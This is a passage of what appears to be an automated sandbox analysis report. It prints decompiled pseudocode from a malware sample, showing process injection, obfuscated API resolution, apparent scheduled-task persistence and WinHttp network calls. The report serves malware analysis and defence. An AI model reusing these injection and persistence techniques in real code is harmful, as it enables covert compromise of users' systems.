    												goto L21;
    											} else {
    												__eflags = _v116;
    												if(_v116 == 0) {
    													goto L21;
    												} else {
    													__eflags = _v112;
    													if(_v112 == 0) {
    														goto L21;
    													} else {
    														_push(0x40);
    														_push(0x3000);
    														_push(0x70);
    														_push(0);
    														_push(_t307);
    														E003A1E80(); // executed
    														_v8 = _t207;
    														__eflags = _t207;
    														if(_t207 == 0) {
    															goto L21;
    														} else {
    															_t208 = E00397B30(_t310, _t307, _t207,  &_v136, 0x70); // executed
    															__eflags = _t208;
    															if(_t208 == 0) {
    																goto L21;
    															} else {
    																_t209 = E00396740(_t310, _t307); // executed
    																__eflags = _t209;
    																if(_t209 == 0) {
    																	goto L21;
    																} else {
    																	__eflags =  *(_t310 + 0x68);
    																	if( *(_t310 + 0x68) == 0) {
    																		_t262 =  *0x3b8628; // 0x593938
    																		_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x64))))(_t307, 0, 0, _t222, _v8, 4, 0);
    																		_a8 = _t211;
    																	} else {
    																		_v18 = _v8;
    																		_v12 = _t222 - _t209 - 0xc;
    																		_v20 = 0x6858;
    																		_v14 = 0xe950;
    																		_t211 = E00397B30(_t310, _t307, _t209,  &_v20, 0xc); // executed
    																	}
    																	__eflags = _t211;
    																	if(_t211 == 0) {
    																		goto L21;
    																	} else {
    																		_t87 = _t310 + 0x84; // 0xc8
    																		_t263 =  *0x3b8628; // 0x593938
    																		 *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x80))))( *_t87);
    																		_t89 = _t310 + 0x80; // 0x828b003b
    																		_t264 =  *0x3b8628; // 0x593938
    																		 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x80))))( *_t89);
    																		_t217 = ResumeThread(_a8); // executed
    																		__eflags = _t217;
    																		if(_t217 == 0) {
    																			goto L21;
    																		} else {
    																			_t218 = E0039E730(_t310);
    																			__eflags = _t218;
    																			if(_t218 == 0) {
    																				goto L21;
    																			} else {
    																				 *(_t310 + 0x90) = _t222;
    																				 *(_t310 + 0x8c) = _v8;
    																				_t224 = _t222 - E0039E8B0 + E0039EA20;
    																				__eflags = _t224;
    																				 *(_t310 + 0x94) = _t224;
    																				 *((intOrPtr*)(_t310 + 0x6c)) = 1;
    																				return 1;
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 0039DFDC
      • Part of subcall function 00397B30: WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0039CCFB,?,?,?,00000070,?,?,?), ref: 00397B5C
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E171
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E199
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E1C1
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E1E9
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E211
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E239
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E261
    • GetProcAddress.KERNEL32(0039C9A1,?), ref: 0039E289
      • Part of subcall function 00396740: NtQueryInformationProcess.NTDLL(00003000,00000000,0039C9A1,00000018,00000000,0039C9A1,0039FE81,00000000), ref: 00396768
    • ResumeThread.KERNELBASE(?), ref: 0039E38F
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E0039EB30() {
    				char _v104;
    				short _v304;
    				intOrPtr _t28;
    				void* _t29;
    				struct HINSTANCE__* _t30;
    				struct HINSTANCE__* _t31;
    				intOrPtr _t35;
    				struct HINSTANCE__* _t39;
    				struct HINSTANCE__* _t41;
    				_Unknown_base(*)()* _t44;
    				_Unknown_base(*)()* _t47;
    				_Unknown_base(*)()* _t50;
    				_Unknown_base(*)()* _t53;
    				_Unknown_base(*)()* _t56;
    				_Unknown_base(*)()* _t59;
    				_Unknown_base(*)()* _t62;
    				_Unknown_base(*)()* _t65;
    				_Unknown_base(*)()* _t68;
    				_Unknown_base(*)()* _t71;
    				intOrPtr _t86;
    				struct HINSTANCE__* _t89;
    				struct HINSTANCE__* _t90;
    				struct HINSTANCE__* _t91;
    				struct HINSTANCE__* _t92;
    				struct HINSTANCE__* _t93;
    				struct HINSTANCE__* _t94;
    				struct HINSTANCE__* _t95;
    				struct HINSTANCE__* _t96;
    				struct HINSTANCE__* _t97;
    				struct HINSTANCE__* _t98;
    				void* _t99;
    				void* _t103;
    
    				_t28 =  *0x3b8628; // 0x593938
    				 *0x3b85c0 = 0;
    				 *0x3b85bc = 0;
    				 *0x3b85c4 = 0;
    				_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xf4))))(_t99, _t103);
    				_t122 = _t29 - 5;
    				if(_t29 <= 5) {
    					L14:
    					_t30 =  *0x3b85bc; // 0x74e50000
    					__eflags = _t30;
    					if(_t30 != 0) {
    						_t35 =  *0x3b8628; // 0x593938
    						 *((intOrPtr*)( *((intOrPtr*)(_t35 + 0x1c))))(_t30);
    						 *0x3b85bc = 0;
    					}
    					goto L16;
    				} else {
    					E00399090(_t122,  &_v304, 0x5b);
    					_t39 = LoadLibraryW( &_v304); // executed
    					 *0x3b85bc = _t39;
    					_t123 = _t39;
    					if(_t39 == 0) {
    						L16:
    						_t31 =  *0x3b85c4; // 0x74e30000
    						__eflags = _t31;
    						if(_t31 != 0) {
    							_t86 =  *0x3b8628; // 0x593938
    							 *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x1c))))(_t31);
    							 *0x3b85c4 = 0;
    						}
    						__eflags = 0;
    						return 0;
    					} else {
    						E00399090(_t123,  &_v304, 0x5c);
    						_t41 = LoadLibraryW( &_v304);
    						 *0x3b85c4 = _t41;
    						if(_t41 == 0) {
    							goto L14;
    						} else {
    							E00396CB0( &_v104, 0x5d);
    							_t89 =  *0x3b85bc; // 0x74e50000
    							_t44 = GetProcAddress(_t89,  &_v104);
    							 *0x3b85d4 = _t44;
    							if(_t44 == 0) {
    								goto L14;
    							} else {
    								E00396CB0( &_v104, 0x5e);
    								_t90 =  *0x3b85bc; // 0x74e50000
    								_t47 = GetProcAddress(_t90,  &_v104);
    								 *0x3b85e8 = _t47;
    								if(_t47 == 0) {
    									goto L14;
    								} else {
    									E00396CB0( &_v104, 0x5f);
    									_t91 =  *0x3b85bc; // 0x74e50000
    									_t50 = GetProcAddress(_t91,  &_v104);
    									 *0x3b85cc = _t50;
    									if(_t50 == 0) {
    										goto L14;
    									} else {
    										E00396CB0( &_v104, 0x60);
    										_t92 =  *0x3b85bc; // 0x74e50000
    										_t53 = GetProcAddress(_t92,  &_v104);
    										 *0x3b85b8 = _t53;
    										if(_t53 == 0) {
    											goto L14;
    										} else {
    											E00396CB0( &_v104, 0x61);
    											_t93 =  *0x3b85c4; // 0x74e30000
    											_t56 = GetProcAddress(_t93,  &_v104);
    											 *0x3b85f4 = _t56;
    											if(_t56 == 0) {
    												goto L14;
    											} else {
    												E00396CB0( &_v104, 0x62);
    												_t94 =  *0x3b85c4; // 0x74e30000
    												_t59 = GetProcAddress(_t94,  &_v104);
    												 *0x3b85e0 = _t59;
    												if(_t59 == 0) {
    													goto L14;
    												} else {
    													E00396CB0( &_v104, 0x63);
    													_t95 =  *0x3b85c4; // 0x74e30000
    													_t62 = GetProcAddress(_t95,  &_v104);
    													 *0x3b85d0 = _t62;
    													if(_t62 == 0) {
    														goto L14;
    													} else {
    														E00396CB0( &_v104, 0x64);
    														_t96 =  *0x3b85c4; // 0x74e30000
    														_t65 = GetProcAddress(_t96,  &_v104);
    														 *0x3b85e4 = _t65;
    														if(_t65 == 0) {
    															goto L14;
    														} else {
    															E00396CB0( &_v104, 0x65);
    															_t97 =  *0x3b85c4; // 0x74e30000
    															_t68 = GetProcAddress(_t97,  &_v104);
    															 *0x3b85f0 = _t68;
    															if(_t68 == 0) {
    																goto L14;
    															} else {
    																E00396CB0( &_v104, 0x66);
    																_t98 =  *0x3b85c4; // 0x74e30000
    																_t71 = GetProcAddress(_t98,  &_v104);
    																 *0x3b85ec = _t71;
    																if(_t71 == 0) {
    																	goto L14;
    																} else {
    																	 *0x3b85c0 = 1;
    																	return 1;
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryW.KERNEL32(?), ref: 0039EB82
    • LoadLibraryW.KERNEL32(?), ref: 0039EBA9
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBD7
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EBFF
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC27
    • GetProcAddress.KERNEL32(74E50000,?), ref: 0039EC4F
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039EC77
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039EC9F
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ECC7
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ECEB
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ED0F
    • GetProcAddress.KERNEL32(74E30000,?), ref: 0039ED33
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    C-Code - Quality: 72%
    			E00393D50(intOrPtr* __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				short _v22;
    				char* _v24;
    				intOrPtr _v26;
    				void* _v28;
    				intOrPtr _v30;
    				void* _v32;
    				intOrPtr _v34;
    				char _v36;
    				char _v40;
    				void* _v44;
    				void* _v48;
    				void* _v52;
    				char _v56;
    				intOrPtr* _v60;
    				void* _v64;
    				void* _v68;
    				void* _v72;
    				short _v74;
    				void* _v76;
    				void _v80;
    				char* _v84;
    				char _v88;
    				char* _v92;
    				intOrPtr* _v96;
    				void* _v100;
    				char _v104;
    				char* _v108;
    				intOrPtr* _v112;
    				char* _v116;
    				char _v120;
    				intOrPtr* _v124;
    				char* _v128;
    				char* _v132;
    				char _v136;
    				char _v280;
    				char _v336;
    				char _v536;
    				void* __ebx;
    				void* __edi;
    				intOrPtr* __esi;
    				intOrPtr* __ebp;
    				intOrPtr* _t239;
    				void* _t241;
    				intOrPtr* _t243;
    				intOrPtr* _t244;
    				intOrPtr* _t245;
    				intOrPtr* _t246;
    				intOrPtr* _t256;
    				intOrPtr* _t260;
    				intOrPtr* _t261;
    				intOrPtr* _t262;
    				intOrPtr* _t264;
    				intOrPtr* _t268;
    				intOrPtr* _t270;
    				intOrPtr* _t271;
    				intOrPtr* _t272;
    				intOrPtr* _t273;
    				intOrPtr* _t275;
    				intOrPtr* _t276;
    				intOrPtr* _t277;
    				intOrPtr* _t278;
    				intOrPtr* _t280;
    				intOrPtr* _t281;
    				void* _t283;
    				intOrPtr* _t284;
    				intOrPtr _t292;
    				void* _t329;
    				void* _t333;
    				intOrPtr* _t334;
    				void* _t338;
    				void* _t342;
    				void* _t344;
    				void* _t345;
    
    				_t349 =  *((intOrPtr*)(__ecx + 4));
    				if( *((intOrPtr*)(__ecx + 4)) == 0) {
    					_t334 = __ecx;
    					_v8 = 0;
    					_v16 = 0;
    					_v20 = 0;
    					_v24 = 0;
    					_v12 = 0;
    					_t284 = 0;
    					_v28 = 0;
    					E00399090(_t349,  &_v280, 0x24);
    					_t239 =  *_t334;
    					_t344 = _t342 - 0x114 + 8;
    					_t241 =  *((intOrPtr*)( *((intOrPtr*)( *_t239 + 0x20))))(_t239,  &_v280, 0x3b613c, 0x3b611c,  &_v8, _t329, _t333, _t283, _t338);
    					if(_t241 >= 0) {
    						E00398030( &_v12);
    						_t345 = _t344 + 4;
    						__eflags = _v12;
    						if(_v12 != 0) {
    							_v28 = 0x101;
    							_t284 = E003A1D90(0x202, 0);
    							_t345 = _t345 + 8;
    							__eflags = _t284;
    							if(_t284 != 0) {
    								_t292 =  *0x3b8628; // 0x593938
    								 *((intOrPtr*)( *((intOrPtr*)(_t292 + 0x138))))(_t284,  &_v28);
    								_t256 = _v8;
    								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t256 + 0x80))))(_t256, _v12);
    								if(__eflags >= 0) {
    									E00399090(__eflags,  &_v280, 0x14);
    									_t260 = _v8;
    									_t345 = _t345 + 8;
    									_t261 =  *((intOrPtr*)( *((intOrPtr*)( *_t260 + 0x50))))(_t260,  &_v280);
    									__eflags = _t261;
    									if(_t261 >= 0) {
    										_t262 = _v8;
    										_t264 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0xc))))(_t262,  &_v32,  &_v20);
    										__eflags = _t264;
    										if(_t264 >= 0) {
    											memset( &_v80, 0, 0x30);
    											_v80 = 0x30;
    											_v76 = 0x7e1;
    											_v72 = 1;
    											_v44 = 1;
    											_t268 = _v20;
    											_t345 = _t345 + 0xc;
    											_v74 = 1;
    											_v60 = 0x5a0;
    											_v56 = 1;
    											_v48 = 1;
    											_t270 =  *((intOrPtr*)( *((intOrPtr*)( *_t268 + 0xc))))(_t268,  &_v80);
    											__eflags = _t270;
    											if(_t270 >= 0) {
    												_t271 = _v8;
    												_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t271 + 0x78))))(_t271, 0x3b32c0, 0);
    												__eflags = _t272 - 0x80070005;
    												if(_t272 == 0x80070005) {
    													_t281 = _v8;
    													_t272 =  *((intOrPtr*)( *((intOrPtr*)( *_t281 + 0x78))))(_t281, _t284, 0);
    												}
    												__eflags = _t272;
    												if(_t272 >= 0) {
    													_t273 = _v8;
    													_t275 =  *((intOrPtr*)( *((intOrPtr*)( *_t273))))(_t273, 0x3b60a0,  &_v16);
    													__eflags = _t275;
    													if(_t275 >= 0) {
    														_t276 = _v16;
    														_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t276 + 0x18))))(_t276, 0, 1);
    														__eflags = _t277 - 0x80070005;
    														if(_t277 == 0x80070005) {
    															_t278 = _v8;
    															 *((intOrPtr*)( *((intOrPtr*)( *_t278 + 0x78))))(_t278, _t284, 0);
    															_t280 = _v16;
    															_t277 =  *((intOrPtr*)( *((intOrPtr*)( *_t280 + 0x18))))(_t280, 0, 1);
    														}
    														__eflags = _t277;
    														if(_t277 >= 0) {
    															_v24 = 1;
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    						_t243 = _v20;
    						__eflags = _t243;
    						if(_t243 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t243 + 8))))(_t243);
    						}
    						_t244 = _v8;
    						__eflags = _t244;
    						if(_t244 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t244 + 8))))(_t244);
    						}
    						_t245 = _v16;
    						__eflags = _t245;
    						if(_t245 != 0) {
    							 *((intOrPtr*)( *((intOrPtr*)( *_t245 + 8))))(_t245);
    						}
    						_t246 = _v12;
    						__eflags = _t246;
    						if(_t246 != 0) {
    							E0039BB40(_t246);
    							_t345 = _t345 + 4;
    						}
    						__eflags = _t284;
    						if(_t284 != 0) {
    							E0039BB40(_t284);
    						}
    						return _v24;
    					} else {
    						return 0 | _t241 == 0x80070050;
    					}
    				} else {
    					__ebp = __esp;
    					__esp = __esp - 0x214;
    					__eax = 0;
    					_v20 = 0;
    					_v48 = 0;
    					_v34 = 0;
    					_v30 = 0;
    					_v26 = 0;
    					__esi = _v28;
    					_v52 = 0;
    					_v22 = __ax;
    					__edi = _v24;
    					_v8 = __ecx;
    					__ebx =  *__ecx;
    					_v16 = 0;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					__edx = 0;
    					_v36 = __dx;
    					__ecx = _v36;
    					__edx = _v32;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					__esp = __esp - 0x10;
    					__eax = __esp;
    					 *__eax = __ecx;
    					 *((intOrPtr*)(__eax + 4)) = __edx;
    					 *((intOrPtr*)(__eax + 8)) = __esi;
    					__esi = _v8;
    					 *((intOrPtr*)(__eax + 0xc)) = __edi;
    					_t91 = __esi + 4; // 0xe8fc4d8d
    					__eax =  *_t91;
    					__eax =  *((intOrPtr*)(__ebx + 0x28));
    					_v44 = 1;
    					__eax =  *( *((intOrPtr*)(__ebx + 0x28)))( *_t91, __edi, __esi, __ebx, __ebp); // executed
    					__eflags = __eax;
    					if(__eax >= 0) {
    						_t94 = __esi + 4; // 0xe8fc4d8d
    						__eax =  *_t94;
    						__ecx =  *__eax;
    						__edx =  &_v20;
    						__eax =  *((intOrPtr*)(__ecx + 0x1c));
    						__eax =  *( *((intOrPtr*)(__ecx + 0x1c)))(__eax, 0,  &_v20);
    						__eflags = __eax;
    						if(__eax >= 0) {
    							__ecx =  &_v52;
    							__eax = E00398030( &_v52);
    							__edx = _v52;
    							_v20 = E003932C0(_v20, _v52); // executed
    							__eflags =  *0x3b8580;
    							if(__eflags == 0) {
    								__edx =  &_v16;
    								__eax = E00395BD0( &_v16, 1); // executed
    								__eflags = __eax;
    								if(__eflags != 0) {
    									 &_v536 = E00399090(__eflags,  &_v536, 0x15);
    									__ecx =  &_v336;
    									__eax = E00399090(__eflags,  &_v336, 0x24);
    									__edi = __imp__#8;
    									__edx =  &_v104;
    									 *__edi( &_v104) = _v96;
    									__ecx = _v92;
    									__esi = _v104;
    									__ebx = _v100;
    									__edx =  &_v88;
    									_v112 = _v96;
    									_v108 = _v92;
    									__eax =  *__edi( &_v88);
    									__ecx = _v84;
    									__eax = _v88;
    									__edx = _v80;
    									_v32 = _v84;
    									__ecx =  &_v536;
    									_v36 = _v88;
    									__eax = _v76;
    									__ecx =  &_v136;
    									_v28 = _v80;
    									_v24 = _v76;
    									__eax = E003B0290( &_v136,  &_v536);
    									__ecx =  *((intOrPtr*)(__eax + 4));
    									__edx =  *__eax;
    									_v68 =  *((intOrPtr*)(__eax + 4));
    									__ecx = _v16;
    									_v72 =  *__eax;
    									__edx =  *((intOrPtr*)(__eax + 8));
    									__eax =  *((intOrPtr*)(__eax + 0xc));
    									__ecx =  &_v40;
    									_v64 = __edx;
    									_v60 = __eax;
    									__eax = E003913C0(__eax,  &_v40, __edi, _v16);
    									__eax =  *__eax;
    									__eflags = __eax;
    									if(__eax == 0) {
    										_v12 = 0;
    									} else {
    										__edx =  *__eax;
    										_v12 =  *__eax;
    									}
    									__eax =  &_v336;
    									__ecx =  &_v56;
    									__eax = E003913C0( &_v336,  &_v56, __edi,  &_v336);
    									__eax =  *__eax;
    									__eflags = __eax;
    									if(__eax == 0) {
    										_v8 = 0;
    									} else {
    										__ecx =  *__eax;
    										_v8 =  *__eax;
    									}
    									__eax =  &_v48;
    									__esp = __esp - 0x10;
    									__eax = __esp;
    									 *__eax = __esi;
    									__esi = _v112;
    									 *((intOrPtr*)(__eax + 4)) = __ebx;
    									 *((intOrPtr*)(__eax + 8)) = _v112;
    									__esi = _v108;
    									 *((intOrPtr*)(__eax + 0xc)) = _v108;
    									__esi = _v36;
    									__esp = __esp - 0x10;
    									__eax = __esp;
    									 *__eax = _v36;
    									__esi = _v32;
    									 *((intOrPtr*)(__eax + 4)) = _v32;
    									__esi = _v28;
    									__ecx = _v20;
    									 *((intOrPtr*)(__eax + 8)) = _v28;
    									__esi = _v24;
    									__edx =  *__ecx;
    									 *((intOrPtr*)(__eax + 0xc)) = _v24;
    									__esi = _v72;
    									__esp = __esp - 0x10;
    									__eax = __esp;
    									 *__eax = _v72;
    									__esi = _v68;
    									 *((intOrPtr*)(__eax + 4)) = _v68;
    									__esi = _v64;
    									 *((intOrPtr*)(__eax + 8)) = _v64;
    									__esi = _v60;
    									 *((intOrPtr*)(__eax + 0xc)) = _v60;
    									__eax = _v12;
    									__eax = _v8;
    									__ecx =  *((intOrPtr*)(__edx + 0x40));
    									__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v8, _v12, 6, 5,  &_v48);
    									__ecx =  &_v56;
    									__ebx = _v8;
    									__eax = E00397CF0( &_v56);
    									__ecx =  &_v40;
    									__eax = E00397CF0( &_v40);
    									__esi = __imp__#9;
    									__edx =  &_v136;
    									 *__esi( &_v136) =  &_v88;
    									__eax =  *__esi( &_v88);
    									__ecx =  &_v104;
    									__eax =  *__esi( &_v104);
    									__eflags = __ebx;
    									if(__ebx >= 0) {
    										__eax = E00396D30(); // executed
    										__eflags = __eax;
    										if(__eax == 0) {
    											_v44 = __eax;
    										}
    									} else {
    										__eflags = __ebx - 0x80070005;
    										if(__ebx == 0x80070005) {
    											__edx =  &_v16;
    											__eflags = E00395BD0( &_v16, 0);
    											if(__eflags != 0) {
    												 &_v336 = E00399090(__eflags,  &_v336, 0x24);
    												__ecx =  &_v120;
    												__eax =  *__edi( &_v120);
    												__edx = _v116;
    												__eax = _v112;
    												__ecx = _v108;
    												__ebx = _v120;
    												_v100 = _v116;
    												__edx =  &_v136;
    												_v96 = _v112;
    												_v92 = _v108;
    												__eax =  *__edi( &_v136);
    												__ecx = _v132;
    												__eax = _v136;
    												__edx = _v128;
    												_v68 = _v132;
    												_v72 = _v136;
    												__eax = _v124;
    												__ecx =  &_v36;
    												_v64 = _v128;
    												_v60 = _v124;
    												__eax =  *__edi( &_v36);
    												__edx = _v32;
    												__ecx = _v24;
    												__eax = _v28;
    												__edi = _v36;
    												_v84 = _v32;
    												__edx = _v16;
    												_v76 = _v24;
    												__ecx =  &_v56;
    												_v80 = __eax;
    												__eax = E003913C0(__eax,  &_v56, __edi, _v16);
    												__eax =  *__eax;
    												__eflags = __eax;
    												if(__eax == 0) {
    													_v8 = 0;
    												} else {
    													__eax =  *__eax;
    													_v8 = __eax;
    												}
    												__ecx =  &_v336;
    												__ecx =  &_v40;
    												__eax = E003913C0(__eax,  &_v40, __edi,  &_v336);
    												__eax =  *__eax;
    												__eflags = __eax;
    												if(__eax == 0) {
    													_v12 = 0;
    												} else {
    													__edx =  *__eax;
    													_v12 =  *__eax;
    												}
    												__eax =  &_v48;
    												__esp = __esp - 0x10;
    												__eax = __esp;
    												 *__eax = __ebx;
    												__ebx = _v100;
    												 *((intOrPtr*)(__eax + 4)) = _v100;
    												__ebx = _v96;
    												 *((intOrPtr*)(__eax + 8)) = _v96;
    												__ebx = _v92;
    												 *((intOrPtr*)(__eax + 0xc)) = _v92;
    												__ebx = _v72;
    												__esp = __esp - 0x10;
    												__eax = __esp;
    												 *__eax = _v72;
    												__ebx = _v68;
    												__ecx = _v20;
    												 *((intOrPtr*)(__eax + 4)) = _v68;
    												__ebx = _v64;
    												__edx =  *__ecx;
    												 *((intOrPtr*)(__eax + 8)) = _v64;
    												__ebx = _v60;
    												 *((intOrPtr*)(__eax + 0xc)) = _v60;
    												__esp = __esp - 0x10;
    												__eax = __esp;
    												 *__eax = __edi;
    												__edi = _v84;
    												 *((intOrPtr*)(__eax + 4)) = _v84;
    												__edi = _v80;
    												 *((intOrPtr*)(__eax + 8)) = _v80;
    												__edi = _v76;
    												 *((intOrPtr*)(__eax + 0xc)) = _v76;
    												__eax = _v8;
    												__eax = _v12;
    												__ecx =  *((intOrPtr*)(__edx + 0x40));
    												__eax =  *((intOrPtr*)( *((intOrPtr*)(__edx + 0x40))))(__ecx, _v12, _v8, 6, 3,  &_v48);
    												__ecx =  &_v40;
    												__eax = E00397CF0( &_v40);
    												__ecx =  &_v56;
    												__eax = E00397CF0( &_v56);
    												__edx =  &_v36;
    												 *__esi( &_v36) =  &_v136;
    												__eax =  *__esi( &_v136);
    												__ecx =  &_v120;
    												__eax =  *__esi( &_v120);
    											}
    										}
    									}
    								}
    							} else {
    								__ecx = _v52;
    								__ecx = __esi;
    								__eax = E003B0580(__esi, __eflags, _v52);
    							}
    						}
    					}
    					__eax = _v48;
    					__eflags = __eax;
    					if(__eax != 0) {
    						__edx =  *__eax;
    						 *((intOrPtr*)(__edx + 8)) =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))))(__eax);
    					}
    					__eax = _v20;
    					__eflags = __eax;
    					if(__eax != 0) {
    						__ecx =  *__eax;
    						__edx =  *((intOrPtr*)(__ecx + 8));
    						__eax =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 8))))(__eax);
    					}
    					__eax = _v16;
    					__eflags = __eax;
    					if(__eax != 0) {
    						__eax = E0039BB40(__eax);
    					}
    					__eax = _v44;
    					_pop(__edi);
    					_pop(__esi);
    					_pop(__ebx);
    					__esp = __ebp;
    					_pop(__ebp);
    					return _v44;
    				}
    			}

    APIs
      • Part of subcall function 00395BD0: LookupAccountSidW.ADVAPI32(00000000,?,?,00000001,?,?,?), ref: 00395C5B
      • Part of subcall function 00395BD0: memcpy.MSVCRT ref: 00395D01
      • Part of subcall function 00395BD0: memcpy.MSVCRT ref: 00395D26
      • Part of subcall function 00395BD0: _time64.MSVCRT ref: 00395DCC
      • Part of subcall function 00395BD0: _localtime64.MSVCRT ref: 00395DDD
      • Part of subcall function 00395BD0: wcsftime.MSVCRT ref: 00395E07
    • VariantInit.OLEAUT32(?), ref: 00396306
    • VariantInit.OLEAUT32(?), ref: 0039631E
      • Part of subcall function 003B0290: SysAllocString.OLEAUT32(Jc9), ref: 003B02A3
      • Part of subcall function 003913C0: ??2@YAPAXI@Z.MSVCRT ref: 003913C9
      • Part of subcall function 003913C0: SysAllocString.OLEAUT32(75CF3F3F), ref: 003913EA
      • Part of subcall function 00397CF0: InterlockedDecrement.KERNEL32(?), ref: 00397CFE
      • Part of subcall function 00397CF0: SysFreeString.OLEAUT32(00000000), ref: 00397D13
      • Part of subcall function 00397CF0: ??_V@YAXPAX@Z.MSVCRT ref: 00397D21
      • Part of subcall function 00397CF0: ??3@YAXPAX@Z.MSVCRT ref: 00397D2A
    • VariantClear.OLEAUT32(?), ref: 0039642C
    • VariantClear.OLEAUT32(?), ref: 00396432
    • VariantClear.OLEAUT32(?), ref: 00396438
    • VariantInit.OLEAUT32(?), ref: 00396479
    • VariantInit.OLEAUT32(?), ref: 00396497
    • VariantInit.OLEAUT32(?), ref: 003964B8
    • VariantClear.OLEAUT32(?), ref: 0039658F
    • VariantClear.OLEAUT32(?), ref: 00396598
    • VariantClear.OLEAUT32(?), ref: 0039659E
      • Part of subcall function 00396D30: GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00396D8D
      • Part of subcall function 003B0580: GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,00000001,?,?,80000001,?,003962C2,?,?,?,?,0039FD54), ref: 003B05FF
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
      • Part of subcall function 003932C0: VariantClear.OLEAUT32(?), ref: 00393352
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(003962AB), ref: 0039337C
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(?), ref: 003933F6
      • Part of subcall function 003932C0: VariantClear.OLEAUT32(?), ref: 00393495
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(?), ref: 003934BB
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd

    Control-flow Graph

    control_flow_graph 282 3b13d0-3b13f2 284 3b14aa-3b14af 282->284 285 3b13f8-3b13fd 282->285 286 3b14b8-3b14c7 284->286 287 3b14b1-3b14b2 WinHttpCloseHandle 284->287 288 3b1409-3b1463 WinHttpSetTimeouts call 399090 WinHttpOpenRequest 285->288 289 3b13ff-3b1406 WinHttpCloseHandle 285->289 287->286 288->284 292 3b1465-3b1468 288->292 289->288 293 3b146a-3b1482 WinHttpSetOption 292->293 294 3b1484-3b1496 WinHttpSendRequest 292->294 293->284 293->294 295 3b14ca-3b14d7 WinHttpReceiveResponse 294->295 296 3b1498-3b14a3 294->296 295->284 297 3b14d9-3b14f4 WinHttpQueryHeaders 295->297 296->284 297->284 298 3b14f6-3b1508 297->298
    APIs
